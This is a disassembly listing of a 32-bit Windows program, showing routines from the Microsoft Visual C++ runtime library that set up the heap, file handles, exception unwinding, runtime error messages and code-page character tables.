loc_403198: ; CODE XREF: sub_4030A5+F6�j
; sub_4030A5+FB�j
inc eax
cmp [eax], bl
jnz short loc_403198
inc eax
cmp [eax], bl
jnz short loc_403198
loc_4031A2: ; CODE XREF: sub_4030A5+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_403CB6
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4031B8
xor esi, esi
jmp short loc_4031C3
; ---------------------------------------------------------------------------
loc_4031B8: ; CODE XREF: sub_4030A5+10D�j
push ebp
push edi
push esi
call sub_402290
add esp, 0Ch
loc_4031C3: ; CODE XREF: sub_4030A5+111�j
push edi
call dword_4050C0 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_4031D0
; ---------------------------------------------------------------------------
loc_4031CE: ; CODE XREF: sub_4030A5+39�j
; sub_4030A5+61�j ...
xor eax, eax
loc_4031D0: ; CODE XREF: sub_4030A5+D6�j
; sub_4030A5+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4030A5 endp
; =============== S U B R O U T I N E =======================================
sub_4031D7 proc near ; CODE XREF: .text:004028AD�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_403CB6
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4031F7
push 1Bh
call sub_402934
pop ecx
loc_4031F7: ; CODE XREF: sub_4031D7+16�j
mov dword_407340, esi
mov dword_407440, 20h
lea eax, [esi+100h]
loc_40320D: ; CODE XREF: sub_4031D7+52�j
cmp esi, eax
jnb short loc_40322B
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_407340
add esi, 8
add eax, 100h
jmp short loc_40320D
; ---------------------------------------------------------------------------
loc_40322B: ; CODE XREF: sub_4031D7+38�j
lea eax, [esp+54h+var_44]
push eax
call dword_4050A4 ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_403307
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_403307
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_403261
mov esi, eax
loc_403261: ; CODE XREF: sub_4031D7+86�j
cmp dword_407440, esi
jge short loc_4032BB
mov edi, offset dword_407344
loc_40326E: ; CODE XREF: sub_4031D7+DA�j
push 100h
call sub_403CB6
test eax, eax
pop ecx
jz short loc_4032B5
add dword_407440, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_40328C: ; CODE XREF: sub_4031D7+CF�j
cmp eax, ecx
jnb short loc_4032A8
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_40328C
; ---------------------------------------------------------------------------
loc_4032A8: ; CODE XREF: sub_4031D7+B7�j
add edi, 4
cmp dword_407440, esi
jl short loc_40326E
jmp short loc_4032BB
; ---------------------------------------------------------------------------
loc_4032B5: ; CODE XREF: sub_4031D7+A4�j
mov esi, dword_407440
loc_4032BB: ; CODE XREF: sub_4031D7+90�j
; sub_4031D7+DC�j
xor edi, edi
test esi, esi
jle short loc_403307
loc_4032C1: ; CODE XREF: sub_4031D7+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_4032FE
mov cl, [ebp+0]
test cl, 1
jz short loc_4032FE
test cl, 8
jnz short loc_4032E0
push eax
call dword_405094 ; GetFileType
test eax, eax
jz short loc_4032FE
loc_4032E0: ; CODE XREF: sub_4031D7+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_407340[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_4032FE: ; CODE XREF: sub_4031D7+EF�j
; sub_4031D7+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_4032C1
loc_403307: ; CODE XREF: sub_4031D7+65�j
; sub_4031D7+71�j ...
xor ebx, ebx
loc_403309: ; CODE XREF: sub_4031D7+195�j
mov eax, dword_407340
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_403364
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_403324
push 0FFFFFFF6h
pop eax
jmp short loc_40332E
; ---------------------------------------------------------------------------
loc_403324: ; CODE XREF: sub_4031D7+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_40332E: ; CODE XREF: sub_4031D7+14B�j
push eax
call dword_4050D8 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_403353
push edi
call dword_405094 ; GetFileType
test eax, eax
jz short loc_403353
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_403359
loc_403353: ; CODE XREF: sub_4031D7+163�j
; sub_4031D7+16E�j
or byte ptr [esi+4], 40h
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403359: ; CODE XREF: sub_4031D7+17A�j
cmp eax, 3
jnz short loc_403368
or byte ptr [esi+4], 8
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403364: ; CODE XREF: sub_4031D7+13E�j
or byte ptr [esi+4], 80h
loc_403368: ; CODE XREF: sub_4031D7+180�j
; sub_4031D7+185�j ...
inc ebx
cmp ebx, 3
jl short loc_403309
push dword_407440
call dword_4050D4 ; SetHandleCount
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_4031D7 endp
; =============== S U B R O U T I N E =======================================
sub_403382 proc near ; CODE XREF: .text:00402898�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call dword_40508C ; HeapCreate
test eax, eax
mov dword_407328, eax
jz short loc_4033B7
call sub_403D2A
test eax, eax
jnz short loc_4033BA
push dword_407328
call dword_405090 ; HeapDestroy
loc_4033B7: ; CODE XREF: sub_403382+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4033BA: ; CODE XREF: sub_403382+27�j
push 1
pop eax
retn
sub_403382 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033C0 proc near ; CODE XREF: sub_4034B8+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4033D8
push [ebp+arg_0]
call sub_404CA6 ; RtlUnwind
loc_4033D8: ; DATA XREF: sub_4033C0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4033C0 endp
; =============== S U B R O U T I N E =======================================
sub_4033E0 proc near ; DATA XREF: sub_403402+A�o
; .text:00403473�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_403401
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_403401: ; CODE XREF: sub_4033E0+10�j
retn
sub_4033E0 endp
; =============== S U B R O U T I N E =======================================
sub_403402 proc near ; CODE XREF: sub_4034B8+67�p
; sub_4034B8+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4033E0
push large dword ptr fs:0
mov large fs:0, esp
loc_40341F: ; CODE XREF: sub_403402:loc_40345A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40345C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40345C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40345A
push 101h
mov eax, [ebx+esi*4+8]
call sub_403496
call dword ptr [ebx+esi*4+8]
loc_40345A: ; CODE XREF: sub_403402+44�j
jmp short loc_40341F
; ---------------------------------------------------------------------------
loc_40345C: ; CODE XREF: sub_403402+2A�j
; sub_403402+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_403402 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4033E0
jnz short locret_40348C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40348C
mov eax, 1
locret_40348C: ; CODE XREF: .text:0040347A�j
; .text:00403485�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_406D8C
jmp short loc_4034A0
; =============== S U B R O U T I N E =======================================
sub_403496 proc near ; CODE XREF: sub_403402+4F�p
; sub_4034B8+78�p
push ebx
push ecx
mov ebx, offset dword_406D8C
mov ecx, [ebp+8]
loc_4034A0: ; CODE XREF: .text:00403494�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_403496 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034B8 proc near ; DATA XREF: .text:00402848�o
; sub_40371C+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_403558
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4034EB: ; CODE XREF: sub_4034B8+90�j
cmp esi, 0FFFFFFFFh
jz short loc_403551
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40353F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40353F
js short loc_40354A
mov edi, [ebx+8]
push ebx
call sub_4033C0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_403402
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_403496
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_40353F: ; CODE XREF: sub_4034B8+40�j
; sub_4034B8+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4034EB
; ---------------------------------------------------------------------------
loc_40354A: ; CODE XREF: sub_4034B8+54�j
mov eax, 0
jmp short loc_40356D
; ---------------------------------------------------------------------------
loc_403551: ; CODE XREF: sub_4034B8+36�j
mov eax, 1
jmp short loc_40356D
; ---------------------------------------------------------------------------
loc_403558: ; CODE XREF: sub_4034B8+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_403402
add esp, 8
pop ebp
mov eax, 1
loc_40356D: ; CODE XREF: sub_4034B8+97�j
; sub_4034B8+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4034B8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_403402
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_403590 proc near ; CODE XREF: sub_402934+9�p
; sub_402959+9�p
mov eax, dword_406F48
cmp eax, 1
jz short loc_4035A7
test eax, eax
jnz short locret_4035C8
cmp dword_406AD4, 1
jnz short locret_4035C8
loc_4035A7: ; CODE XREF: sub_403590+8�j
push 0FCh
call sub_4035C9
mov eax, dword_4070A4
pop ecx
test eax, eax
jz short loc_4035BD
call eax ; dword_4070A4
loc_4035BD: ; CODE XREF: sub_403590+29�j
push 0FFh
call sub_4035C9
pop ecx
locret_4035C8: ; CODE XREF: sub_403590+C�j
; sub_403590+15�j
retn
sub_403590 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035C9 proc near ; CODE XREF: sub_402934+12�p
; sub_402959+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_406DA0
loc_4035DC: ; CODE XREF: sub_4035C9+20�j
cmp edx, [eax]
jz short loc_4035EB
add eax, 8
inc ecx
cmp eax, offset byte_406E30
jl short loc_4035DC
loc_4035EB: ; CODE XREF: sub_4035C9+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_406DA0[esi]
jnz loc_403719
mov eax, dword_406F48
cmp eax, 1
jz loc_4036F3
test eax, eax
jnz short loc_40361C
cmp dword_406AD4, 1
jz loc_4036F3
loc_40361C: ; CODE XREF: sub_4035C9+44�j
cmp edx, 0FCh
jz loc_403719
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
test eax, eax
jnz short loc_403653
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_402720
pop ecx
pop ecx
loc_403653: ; CODE XREF: sub_4035C9+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_402210
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_403696
lea eax, [ebp+var_1A4]
push eax
call sub_402210
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_404600
add esp, 10h
loc_403696: ; CODE XREF: sub_4035C9+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_402720
lea eax, [ebp+var_A0]
push edi
push eax
call sub_402730
lea eax, [ebp+var_A0]
push offset asc_4053E8 ; "\n\n"
push eax
call sub_402730
push off_406DA4[esi]
lea eax, [ebp+var_A0]
push eax
call sub_402730
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_404573
add esp, 2Ch
pop edi
jmp short loc_403719
; ---------------------------------------------------------------------------
loc_4036F3: ; CODE XREF: sub_4035C9+3C�j
; sub_4035C9+4D�j
lea eax, [ebp+arg_0]
lea esi, off_406DA4[esi]
push 0
push eax
push dword ptr [esi]
call sub_402210
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_4050D8 ; GetStdHandle
push eax
call dword_40507C ; WriteFile
loc_403719: ; CODE XREF: sub_4035C9+2E�j
; sub_4035C9+59�j ...
pop esi
leave
retn
sub_4035C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40371C proc near ; CODE XREF: sub_402A4C+5E�p
; sub_403AE6+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405428
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_4070A8
xor ebx, ebx
cmp eax, ebx
jnz short loc_40378B
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_405424
push esi
call dword_405070 ; GetStringTypeW
test eax, eax
jz short loc_403769
mov eax, esi
jmp short loc_403786
; ---------------------------------------------------------------------------
loc_403769: ; CODE XREF: sub_40371C+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_406F38
push esi
push ebx
call dword_405074 ; GetStringTypeA
test eax, eax
jz loc_403851
push 2
pop eax
loc_403786: ; CODE XREF: sub_40371C+4B�j
mov dword_4070A8, eax
loc_40378B: ; CODE XREF: sub_40371C+2F�j
cmp eax, 2
jnz short loc_4037B4
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_40379C
mov eax, dword_4070C4
loc_40379C: ; CODE XREF: sub_40371C+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_405074 ; GetStringTypeA
jmp loc_403853
; ---------------------------------------------------------------------------
loc_4037B4: ; CODE XREF: sub_40371C+72�j
cmp eax, 1
jnz loc_403851
cmp [ebp+arg_10], ebx
jnz short loc_4037CA
mov eax, dword_4070D4
mov [ebp+arg_10], eax
loc_4037CA: ; CODE XREF: sub_40371C+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_405078 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_403851
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4021B0
add esp, 0Ch
jmp short loc_403820
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_403820: ; CODE XREF: sub_40371C+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_403851
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_405078 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_403851
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_405070 ; GetStringTypeW
jmp short loc_403853
; ---------------------------------------------------------------------------
loc_403851: ; CODE XREF: sub_40371C+61�j
; sub_40371C+9B�j ...
xor eax, eax
loc_403853: ; CODE XREF: sub_40371C+93�j
; sub_40371C+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40371C endp
; =============== S U B R O U T I N E =======================================
sub_403865 proc near ; CODE XREF: sub_402D47+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_403876
add esp, 0Ch
retn
sub_403865 endp
; =============== S U B R O U T I N E =======================================
sub_403876 proc near ; CODE XREF: sub_403865+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_407221[eax], cl
jnz short loc_4038A3
cmp [esp+arg_4], 0
jz short loc_40389C
movzx eax, word_406AEA[eax*2]
and eax, [esp+arg_4]
jmp short loc_40389E
; ---------------------------------------------------------------------------
loc_40389C: ; CODE XREF: sub_403876+16�j
xor eax, eax
loc_40389E: ; CODE XREF: sub_403876+24�j
test eax, eax
jnz short loc_4038A3
retn
; ---------------------------------------------------------------------------
loc_4038A3: ; CODE XREF: sub_403876+F�j
; sub_403876+2A�j
push 1
pop eax
retn
sub_403876 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038A7 proc near ; CODE XREF: sub_403C6B+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_403A40 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, dword_407100
mov [ebp+arg_0], esi
jz loc_403A34
xor ebx, ebx
cmp esi, ebx
jz loc_403A2A
xor edx, edx
mov eax, offset dword_406E38
loc_4038DB: ; CODE XREF: sub_4038A7+41�j
cmp [eax], esi
jz short loc_403951
add eax, 30h
inc edx
cmp eax, offset dword_406F28
jl short loc_4038DB
lea eax, [ebp+var_18]
push eax
push esi
call dword_40506C ; GetCPInfo
cmp eax, 1
jnz loc_403A22
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407220
cmp [ebp+var_18], 1
mov dword_407100, esi
rep stosd
stosb
mov dword_407324, ebx
jbe loc_403A10
cmp [ebp+var_12], 0
jz loc_4039E6
lea ecx, [ebp+var_11]
loc_40392E: ; CODE XREF: sub_4038A7+139�j
mov dl, [ecx]
test dl, dl
jz loc_4039E6
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_40393F: ; CODE XREF: sub_4038A7+A8�j
cmp eax, edx
ja loc_4039DA
or byte_407221[eax], 4
inc eax
jmp short loc_40393F
; ---------------------------------------------------------------------------
loc_403951: ; CODE XREF: sub_4038A7+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407220
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_406E48[esi]
loc_40396D: ; CODE XREF: sub_4038A7+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_4039A0
loc_403974: ; CODE XREF: sub_4038A7+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_4039A0
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_403999
mov edx, [ebp+var_4]
mov dl, byte_406E30[edx]
loc_40398E: ; CODE XREF: sub_4038A7+F0�j
or byte_407221[eax], dl
inc eax
cmp eax, edi
jbe short loc_40398E
loc_403999: ; CODE XREF: sub_4038A7+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_403974
loc_4039A0: ; CODE XREF: sub_4038A7+CB�j
; sub_4038A7+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_40396D
mov eax, [ebp+arg_0]
mov dword_40711C, 1
push eax
mov dword_407100, eax
call sub_403A8A
lea esi, dword_406E3C[esi]
mov edi, offset dword_407110
movsd
movsd
pop ecx
mov dword_407324, eax
movsd
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_4039DA: ; CODE XREF: sub_4038A7+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_40392E
loc_4039E6: ; CODE XREF: sub_4038A7+7E�j
; sub_4038A7+8B�j
push 1
pop eax
loc_4039E9: ; CODE XREF: sub_4038A7+14F�j
or byte_407221[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_4039E9
push esi
call sub_403A8A
pop ecx
mov dword_407324, eax
mov dword_40711C, 1
jmp short loc_403A16
; ---------------------------------------------------------------------------
loc_403A10: ; CODE XREF: sub_4038A7+74�j
mov dword_40711C, ebx
loc_403A16: ; CODE XREF: sub_4038A7+167�j
xor eax, eax
mov edi, offset dword_407110
stosd
stosd
stosd
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_403A22: ; CODE XREF: sub_4038A7+51�j
cmp dword_4070AC, ebx
jz short loc_403A38
loc_403A2A: ; CODE XREF: sub_4038A7+27�j
call sub_403ABD
loc_403A2F: ; CODE XREF: sub_4038A7+131�j
; sub_4038A7+179�j
call sub_403AE6
loc_403A34: ; CODE XREF: sub_4038A7+1D�j
xor eax, eax
jmp short loc_403A3B
; ---------------------------------------------------------------------------
loc_403A38: ; CODE XREF: sub_4038A7+181�j
or eax, 0FFFFFFFFh
loc_403A3B: ; CODE XREF: sub_4038A7+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4038A7 endp
; =============== S U B R O U T I N E =======================================
sub_403A40 proc near ; CODE XREF: sub_4038A7+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_4070AC, 0
cmp eax, 0FFFFFFFEh
jnz short loc_403A60
mov dword_4070AC, 1
jmp dword_405064
; ---------------------------------------------------------------------------
loc_403A60: ; CODE XREF: sub_403A40+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_403A75
mov dword_4070AC, 1
jmp dword_405068
; ---------------------------------------------------------------------------
loc_403A75: ; CODE XREF: sub_403A40+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_403A89
mov eax, dword_4070D4
mov dword_4070AC, 1
locret_403A89: ; CODE XREF: sub_403A40+38�j
retn
sub_403A40 endp
; =============== S U B R O U T I N E =======================================
sub_403A8A proc near ; CODE XREF: sub_4038A7+118�p
; sub_4038A7+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_403AB7
sub eax, 4
jz short loc_403AB1
sub eax, 0Dh
jz short loc_403AAB
dec eax
jz short loc_403AA5
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403AA5: ; CODE XREF: sub_403A8A+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_403AAB: ; CODE XREF: sub_403A8A+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_403AB1: ; CODE XREF: sub_403A8A+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_403AB7: ; CODE XREF: sub_403A8A+9�j
mov eax, 411h
retn
sub_403A8A endp
; =============== S U B R O U T I N E =======================================
sub_403ABD proc near ; CODE XREF: sub_4038A7:loc_403A2A�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_407220
rep stosd
stosb
xor eax, eax
mov edi, offset dword_407110
mov dword_407100, eax
mov dword_40711C, eax
mov dword_407324, eax
stosd
stosd
stosd
pop edi
retn
sub_403ABD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AE6 proc near ; CODE XREF: sub_4038A7:loc_403A2F�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_407100
call dword_40506C ; GetCPInfo
cmp eax, 1
jnz loc_403C1F
xor eax, eax
mov esi, 100h
loc_403B10: ; CODE XREF: sub_403AE6+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_403B10
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_403B61
push ebx
push edi
lea edx, [ebp+var_D]
loc_403B2F: ; CODE XREF: sub_403AE6+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_403B56
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_403B56: ; CODE XREF: sub_403AE6+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_403B2F
pop edi
pop ebx
loc_403B61: ; CODE XREF: sub_403AE6+42�j
push 0
lea eax, [ebp+var_514]
push dword_407324
push dword_407100
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_40371C
push 0
lea eax, [ebp+var_214]
push dword_407100
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_407324
call sub_4046FE
push 0
lea eax, [ebp+var_314]
push dword_407100
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_407324
call sub_4046FE
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_403BDC: ; CODE XREF: sub_403AE6+135�j
mov dx, [ecx]
test dl, 1
jz short loc_403BFA
or byte_407221[eax], 10h
mov dl, [ebp+eax+var_214]
loc_403BF2: ; CODE XREF: sub_403AE6+127�j
mov byte_407120[eax], dl
jmp short loc_403C16
; ---------------------------------------------------------------------------
loc_403BFA: ; CODE XREF: sub_403AE6+FC�j
test dl, 2
jz short loc_403C0F
or byte_407221[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_403BF2
; ---------------------------------------------------------------------------
loc_403C0F: ; CODE XREF: sub_403AE6+117�j
and byte_407120[eax], 0
loc_403C16: ; CODE XREF: sub_403AE6+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_403BDC
jmp short loc_403C68
; ---------------------------------------------------------------------------
loc_403C1F: ; CODE XREF: sub_403AE6+1D�j
xor eax, eax
mov esi, 100h
loc_403C26: ; CODE XREF: sub_403AE6+180�j
cmp eax, 41h
jb short loc_403C44
cmp eax, 5Ah
ja short loc_403C44
or byte_407221[eax], 10h
mov cl, al
add cl, 20h
loc_403C3C: ; CODE XREF: sub_403AE6+174�j
mov byte_407120[eax], cl
jmp short loc_403C63
; ---------------------------------------------------------------------------
loc_403C44: ; CODE XREF: sub_403AE6+143�j
; sub_403AE6+148�j
cmp eax, 61h
jb short loc_403C5C
cmp eax, 7Ah
ja short loc_403C5C
or byte_407221[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_403C3C
; ---------------------------------------------------------------------------
loc_403C5C: ; CODE XREF: sub_403AE6+161�j
; sub_403AE6+166�j
and byte_407120[eax], 0
loc_403C63: ; CODE XREF: sub_403AE6+15C�j
inc eax
cmp eax, esi
jb short loc_403C26
loc_403C68: ; CODE XREF: sub_403AE6+137�j
pop esi
leave
